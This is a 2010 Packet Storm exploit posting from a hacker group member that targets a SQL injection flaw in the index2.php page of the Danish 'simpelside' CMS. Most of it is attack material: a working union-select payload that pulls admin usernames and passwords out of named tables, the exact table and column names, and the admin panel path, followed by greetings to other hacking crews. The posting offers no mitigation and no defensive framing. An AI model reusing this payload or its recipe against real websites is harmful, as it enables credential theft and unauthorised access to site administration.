Simpleside SQL Injection

2010-05-26T00:00:00
ID PACKETSTORM:89940
Type packetstorm
Reporter MN9
Modified 2010-05-26T00:00:00

Description

                                        
                                            `  
  
  
#Tital : simpelside (index2.php) SQL Injection Vulnerability#EDB-ID: # CVE-ID: ()# OSVDB-ID: ()# Author: MN9# Published: 2010-05-25# Verified: yes  
  
  
  
##########################################################>..> Author : MN9  
>..> Email : Mn9(at)Live.No >..> Script Home : www.simpelside.dk  
>..> Doork : :)##########################################################  
~## Exploit ##~   
http://site/index2.php?id=2 [ SQL Injection ] &mainid=2  
  
~## Example ##~ http://site/index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2  
  
##########################################################  
# All Tables admin ::   
web1_brugereweb2_brugereweb3_brugereweb4_brugere  
# column user : brugernavn# column pass : adgangskode##########################################################  
# admin panel :  
http://site/admin/  
##########################################################  
# Greetz to :  
RoMaNcYxHaCkEr ~ Mr.SaFa7 ~ Sniper code ~ All Al-Mslm3n  
  
[ v4-team.com ] && [ 7rs.org ]  
  
  
  
  
  
_________________________________________________________________  
Hotmail: خدمة بريد إلكتروني مجانية وموثوق بها وغنية.  
https://signup.live.com/signup.aspx?id=60969  
  
`